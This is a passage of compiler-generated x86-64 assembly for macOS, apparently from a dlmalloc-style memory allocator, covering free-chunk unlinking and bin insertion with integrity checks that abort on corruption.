movq -176(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -188(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -359(%rbp) ## 1-byte Spill
je LBB42_95
## %bb.92:
movq -176(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -360(%rbp) ## 1-byte Spill
jb LBB42_94
## %bb.93:
movq -176(%rbp), %rax
movq 24(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -360(%rbp) ## 1-byte Spill
LBB42_94:
movb -360(%rbp), %al ## 1-byte Reload
movb %al, -359(%rbp) ## 1-byte Spill
LBB42_95:
movb -359(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_107
## %bb.96:
movq -184(%rbp), %rax
cmpq -176(%rbp), %rax
jne LBB42_98
## %bb.97:
movl -188(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB42_106
LBB42_98:
movq -184(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -188(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -361(%rbp) ## 1-byte Spill
je LBB42_102
## %bb.99:
movq -184(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -362(%rbp) ## 1-byte Spill
jb LBB42_101
## %bb.100:
movq -184(%rbp), %rax
movq 16(%rax), %rax
cmpq -32(%rbp), %rax
sete %al
movb %al, -362(%rbp) ## 1-byte Spill
LBB42_101:
movb -362(%rbp), %al ## 1-byte Reload
movb %al, -361(%rbp) ## 1-byte Spill
LBB42_102:
movb -361(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_104
## %bb.103:
movq -184(%rbp), %rcx
movq -176(%rbp), %rax
movq %rcx, 24(%rax)
movq -176(%rbp), %rcx
movq -184(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_105
LBB42_104:
callq _abort
LBB42_105:
jmp LBB42_106
LBB42_106:
jmp LBB42_108
LBB42_107:
callq _abort
LBB42_108:
jmp LBB42_158
LBB42_109:
movq -32(%rbp), %rax
movq %rax, -200(%rbp)
movq -200(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -208(%rbp)
movq -200(%rbp), %rax
movq 24(%rax), %rax
cmpq -200(%rbp), %rax
je LBB42_117
## %bb.110:
movq -200(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -224(%rbp)
movq -200(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -216(%rbp)
movq -224(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -363(%rbp) ## 1-byte Spill
jb LBB42_113
## %bb.111:
movq -224(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -200(%rbp), %rcx
movb %al, -363(%rbp) ## 1-byte Spill
jne LBB42_113
## %bb.112:
movq -216(%rbp), %rax
movq 16(%rax), %rax
cmpq -200(%rbp), %rax
sete %al
movb %al, -363(%rbp) ## 1-byte Spill
LBB42_113:
movb -363(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_115
## %bb.114:
movq -216(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_116
LBB42_115:
callq _abort
LBB42_116:
jmp LBB42_129
LBB42_117:
movq -200(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -232(%rbp)
movq 40(%rax), %rax
movq %rax, -216(%rbp)
cmpq $0, %rax
jne LBB42_119
## %bb.118:
movq -200(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -232(%rbp)
movq 32(%rax), %rax
movq %rax, -216(%rbp)
cmpq $0, %rax
je LBB42_128
LBB42_119:
jmp LBB42_120
LBB42_120: ## =>This Inner Loop Header: Depth=1
movq -216(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -240(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -364(%rbp) ## 1-byte Spill
jne LBB42_122
## %bb.121: ## in Loop: Header=BB42_120 Depth=1
movq -216(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -240(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -364(%rbp) ## 1-byte Spill
LBB42_122: ## in Loop: Header=BB42_120 Depth=1
movb -364(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB42_123
jmp LBB42_124
LBB42_123: ## in Loop: Header=BB42_120 Depth=1
movq -240(%rbp), %rax
movq %rax, -232(%rbp)
movq (%rax), %rax
movq %rax, -216(%rbp)
jmp LBB42_120
LBB42_124:
movq -232(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_126
## %bb.125:
movq -232(%rbp), %rax
movq $0, (%rax)
jmp LBB42_127
LBB42_126:
callq _abort
LBB42_127:
jmp LBB42_128
LBB42_128:
jmp LBB42_129
LBB42_129:
cmpq $0, -208(%rbp)
je LBB42_157
## %bb.130:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -200(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -248(%rbp)
movq -200(%rbp), %rax
movq -248(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB42_134
## %bb.131:
movq -216(%rbp), %rax
movq -248(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB42_133
## %bb.132:
movq -200(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB42_133:
jmp LBB42_141
LBB42_134:
movq -208(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_139
## %bb.135:
movq -208(%rbp), %rax
movq 32(%rax), %rax
cmpq -200(%rbp), %rax
jne LBB42_137
## %bb.136:
movq -216(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB42_138
LBB42_137:
movq -216(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 40(%rax)
LBB42_138:
jmp LBB42_140
LBB42_139:
callq _abort
LBB42_140:
jmp LBB42_141
LBB42_141:
cmpq $0, -216(%rbp)
je LBB42_156
## %bb.142:
movq -216(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_154
## %bb.143:
movq -208(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 48(%rax)
movq -200(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -256(%rbp)
cmpq $0, %rax
je LBB42_148
## %bb.144:
movq -256(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_146
## %bb.145:
movq -256(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 32(%rax)
movq -216(%rbp), %rcx
movq -256(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB42_147
LBB42_146:
callq _abort
LBB42_147:
jmp LBB42_148
LBB42_148:
movq -200(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -264(%rbp)
cmpq $0, %rax
je LBB42_153
## %bb.149:
movq -264(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_151
## %bb.150:
movq -264(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 40(%rax)
movq -216(%rbp), %rcx
movq -264(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB42_152
LBB42_151:
callq _abort
LBB42_152:
jmp LBB42_153
LBB42_153:
jmp LBB42_155
LBB42_154:
callq _abort
LBB42_155:
jmp LBB42_156
LBB42_156:
jmp LBB42_157
LBB42_157:
jmp LBB42_158
LBB42_158:
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -16(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB42_160
## %bb.159:
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
jmp LBB42_201
LBB42_160:
jmp LBB42_161
LBB42_161:
jmp LBB42_162
LBB42_162:
jmp LBB42_164
LBB42_163:
movq -32(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rdx
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx)
LBB42_164:
movq -24(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB42_172
## %bb.165:
movq -24(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -268(%rbp)
movq -8(%rbp), %rax
addq $72, %rax
movl -268(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -280(%rbp)
movq -280(%rbp), %rax
movq %rax, -288(%rbp)
movq -8(%rbp), %rax
movl (%rax), %eax
movl -268(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB42_167
## %bb.166:
movl -268(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB42_171
LBB42_167:
movq -280(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_169
## %bb.168:
movq -280(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -288(%rbp)
jmp LBB42_170
LBB42_169:
callq _abort
LBB42_170:
jmp LBB42_171
LBB42_171:
movq -16(%rbp), %rcx
movq -280(%rbp), %rax
movq %rcx, 16(%rax)
movq -16(%rbp), %rcx
movq -288(%rbp), %rax
movq %rcx, 24(%rax)
movq -288(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 16(%rax)
movq -280(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
jmp LBB42_199
LBB42_172:
movq -16(%rbp), %rax
movq %rax, -296(%rbp)
movq -24(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -312(%rbp)
cmpl $0, -312(%rbp)
jne LBB42_174
## %bb.173:
movl $0, -308(%rbp)
jmp LBB42_178
LBB42_174:
cmpl $65535, -312(%rbp) ## imm = 0xFFFF
jbe LBB42_176
## %bb.175:
movl $31, -308(%rbp)
jmp LBB42_177
LBB42_176:
movl -312(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -316(%rbp)
movl -316(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -24(%rbp), %rdx
movl -316(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -308(%rbp)
LBB42_177:
jmp LBB42_178
LBB42_178:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movl -308(%rbp), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -304(%rbp)
movl -308(%rbp), %ecx
movq -296(%rbp), %rax
movl %ecx, 56(%rax)
movq -296(%rbp), %rax
movq $0, 40(%rax)
movq -296(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movl 4(%rax), %eax
movl -308(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB42_180
## %bb.179:
movl -308(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl 4(%rax), %ecx
movl %ecx, 4(%rax)
movq -296(%rbp), %rcx
movq -304(%rbp), %rax
movq %rcx, (%rax)
movq -304(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 48(%rax)
movq -296(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_198
LBB42_180:
movq -304(%rbp), %rax
movq (%rax), %rax
movq %rax, -328(%rbp)
movq -24(%rbp), %rax
movq %rax, -376(%rbp) ## 8-byte Spill
cmpl $31, -308(%rbp)
jne LBB42_182
## %bb.181:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -384(%rbp) ## 8-byte Spill
jmp LBB42_183
LBB42_182:
movl -308(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -384(%rbp) ## 8-byte Spill
LBB42_183:
movq -376(%rbp), %rax ## 8-byte Reload
movq -384(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -336(%rbp)
LBB42_184: ## =>This Inner Loop Header: Depth=1
movq -328(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -24(%rbp), %rax
je LBB42_191
## %bb.185: ## in Loop: Header=BB42_184 Depth=1
movq -328(%rbp), %rax
addq $32, %rax
movq -336(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -344(%rbp)
movq -336(%rbp), %rax
shlq $1, %rax
movq %rax, -336(%rbp)
movq -344(%rbp), %rax
cmpq $0, (%rax)
je LBB42_187
## %bb.186: ## in Loop: Header=BB42_184 Depth=1
movq -344(%rbp), %rax
movq (%rax), %rax
movq %rax, -328(%rbp)
jmp LBB42_190
LBB42_187:
movq -344(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_189
## %bb.188:
movq -296(%rbp), %rcx
movq -344(%rbp), %rax
movq %rcx, (%rax)
movq -328(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 48(%rax)
movq -296(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB42_197
LBB42_189:
callq _abort
LBB42_190: ## in Loop: Header=BB42_184 Depth=1
jmp LBB42_196
LBB42_191:
movq -328(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -352(%rbp)
movq -328(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -385(%rbp) ## 1-byte Spill
jb LBB42_193
## %bb.192:
movq -352(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
movb %al, -385(%rbp) ## 1-byte Spill
LBB42_193:
movb -385(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB42_195
## %bb.194:
movq -296(%rbp), %rcx
movq -352(%rbp), %rax
movq %rcx, 24(%rax)
movq -328(%rbp), %rax
movq %rcx, 16(%rax)
movq -352(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 16(%rax)
movq -328(%rbp), %rcx
movq -296(%rbp), %rax
movq %rcx, 24(%rax)
movq -296(%rbp), %rax
movq $0, 48(%rax)
jmp LBB42_197
LBB42_195:
callq _abort
LBB42_196: ## in Loop: Header=BB42_184 Depth=1
jmp LBB42_184
LBB42_197:
jmp LBB42_198
LBB42_198:
jmp LBB42_199
LBB42_199:
jmp LBB42_201
LBB42_200:
callq _abort
LBB42_201:
addq $400, %rsp ## imm = 0x190
popq %rbp
retq
.cfi_endproc
## -- End function
.zerofill __DATA,__bss,__gm_,936,3 ## @_gm_
.zerofill __DATA,__bss,_mparams,48,3 ## @mparams
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "max system bytes = %10lu\n"
L_.str.1: ## @.str.1
.asciz "system bytes = %10lu\n"
L_.str.2: ## @.str.2
.asciz "in use bytes = %10lu\n"
.subsections_via_symbols
| the_stack_data/60747.c |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.